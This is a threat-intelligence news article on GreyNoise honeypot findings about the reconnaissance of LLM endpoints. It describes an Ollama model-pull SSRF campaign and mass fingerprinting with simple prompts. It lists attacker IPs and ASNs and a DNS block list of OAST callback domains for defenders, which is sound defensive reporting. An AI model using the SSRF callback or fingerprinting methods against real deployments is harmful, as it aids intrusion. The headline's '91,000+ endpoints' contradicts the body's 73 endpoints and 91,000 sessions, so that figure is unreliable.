Threat IntelligenceJanuary 14, 20264 min read

Attackers Mapped 91,000+ AI Endpoints in Mass Recon Campaign

GreyNoise honeypot data reveals coordinated reconnaissance of LLM infrastructure including OpenAI, Claude, and Ollama deployments over 11 days.

Alex Kowalski

Threat actors systematically probed more than 73 large language model endpoints across 91,000 attack sessions between late December and early January, according to new research from GreyNoise. The reconnaissance campaign targeted organizations running Ollama, OpenAI-compatible APIs, and Google Gemini services.

The scale suggests this isn't opportunistic scanning. GreyNoise assessed the campaign was conducted by professional threat actors building target lists for future exploitation.

Two Distinct Campaigns

GreyNoise's Ollama honeypot infrastructure captured 91,403 attack sessions between October 2025 and January 2026. Analysis revealed two separate operations:

The Christmas SSRF Campaign ran from October through January with a significant spike during the holiday period—1,688 sessions in just 48 hours around December 25. Attackers abused Ollama's model pull functionality to exploit server-side request forgery vulnerabilities, injecting malicious registry URLs to force outbound connections to attacker-controlled infrastructure.

The SSRF campaign used ProjectDiscovery's OAST (Out-of-band Application Security Testing) infrastructure to validate successful exploitation. When a vulnerable Ollama instance called back to attacker domains, it confirmed the system was exploitable and reachable.

The Mass Enumeration Campaign generated 80,469 sessions over 11 days between December 28, 2025 and January 8, 2026. Two IP addresses methodically tested 73 different LLM model endpoints, probing for OpenAI and Gemini API formats.

Targeted models included OpenAI's GPT family, Anthropic's Claude, Meta's Llama, Google's Gemini, DeepSeek, Mistral, Alibaba's Qwen, and xAI's Grok. The attackers weren't looking for one specific deployment—they were mapping everything.

Fingerprinting Queries

The enumeration campaign used distinctive queries to identify active LLM endpoints:

  • "hi" appeared 32,716 times
  • "How many states are there in the United States?" appeared 27,778 times
  • Empty strings and letter-counting queries (like "How many letter r are in strawberry?") were used to fingerprint specific models

These queries test whether an endpoint responds and what model type powers it. Different LLMs answer these questions in characteristic ways, allowing attackers to identify which organizations run which models—useful information for crafting model-specific attacks later.

Attribution Indicators

Both campaigns show signs of coordinated tooling. Ninety-nine percent of attack sessions shared the same JA4H fingerprint despite originating from 62 different IP addresses across 27 countries. This pattern suggests attackers used VPS infrastructure along with shared automation tools—likely ProjectDiscovery's Nuclei scanner.

The primary attack IPs have concerning histories. The two addresses responsible for the enumeration campaign (45.88.186.70 and 204.76.203.125) are linked to over 200 CVE exploitation campaigns and more than 4 million sensor hits in GreyNoise's database.

These aren't script kiddies. This is infrastructure associated with professional cybercrime operations.

Why Target LLM Infrastructure?

Organizations increasingly deploy LLMs for internal applications, customer service, code generation, and data analysis. Misconfigured deployments can expose sensitive data or provide compute resources attackers can exploit.

Potential attack objectives include:

API key theft: Compromised LLM endpoints may contain API keys for paid services. Attackers harvest these to run their own queries on someone else's bill—or resell access on underground markets.

Data exfiltration: LLMs ingesting enterprise data may respond to crafted prompts with sensitive information. If the deployment lacks proper access controls, attackers can extract training data or connected knowledge bases.

Compute hijacking: Running LLMs is expensive. Attackers targeting exposed Ollama instances could offload their own model inference costs onto compromised infrastructure.

Supply chain attacks: Misconfigured model registries can be poisoned with backdoored models. Organizations that pull models from untrusted sources risk running malicious code.

Defensive Recommendations

GreyNoise recommends several mitigations for organizations running LLM infrastructure:

  1. Restrict model pulls to trusted registries only—don't allow Ollama or similar tools to fetch arbitrary models from the internet

  2. Block OAST callback domains at the DNS level (*.oast.live, *.oast.me, *.oast.online)

  3. Rate-limit suspicious ASNs—AS152194, AS210558, and AS51396 all appeared prominently in attack traffic

  4. Monitor for fingerprinting queries—unusual patterns like repeated "hi" messages or letter-counting questions may indicate reconnaissance

  5. Implement egress filtering to prevent SSRF callbacks from reaching attacker infrastructure

The full GreyNoise report includes additional technical indicators and JA4 fingerprints for detection.

The Bigger Picture

AI deployments are expanding faster than security practices can keep up. Organizations racing to deploy LLM capabilities often prioritize functionality over hardening. The result is exactly what GreyNoise observed: a growing attack surface that sophisticated actors are systematically cataloging.

80,000 enumeration requests represent investment. Attackers don't map infrastructure at this scale without plans to use that map. Organizations running exposed LLM services should assume they've been cataloged and harden their deployments before exploitation attempts begin.

Related Articles